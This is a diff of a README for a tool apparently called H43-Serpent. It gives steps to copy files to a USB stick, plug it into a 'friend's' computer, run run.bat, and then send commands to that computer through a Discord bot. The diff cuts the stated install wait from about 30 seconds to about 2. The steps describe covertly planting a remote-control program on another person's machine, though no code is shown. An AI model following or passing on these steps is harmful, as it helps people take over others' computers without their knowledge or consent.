Fytex/H43-Serpent/README.md

 9. Save the config.ini
 10. Copy all the files to a Pen USB.
 11. When you are near your friend just plug the Pen USB in his computer and double click on `run.bat`
-11. Wait until the window closes which can take ~30s (there is a small chance that the dependencies are already installed which could reduce the time from ~30s to ~1s) and everything done.
-Wait 2s and unplug the Pen USB.
+11. Wait until the window closes which takes about ~2s.
+Now unplug the Pen USB and it's all done!
 12. Go back to your computer/mobile and in your discord server which has the bot you should be able to run any command Target-Command.
 Ex: Fytex-help
 13. To view more info about each command do Target-help Command.
 Ex: Fytex-help type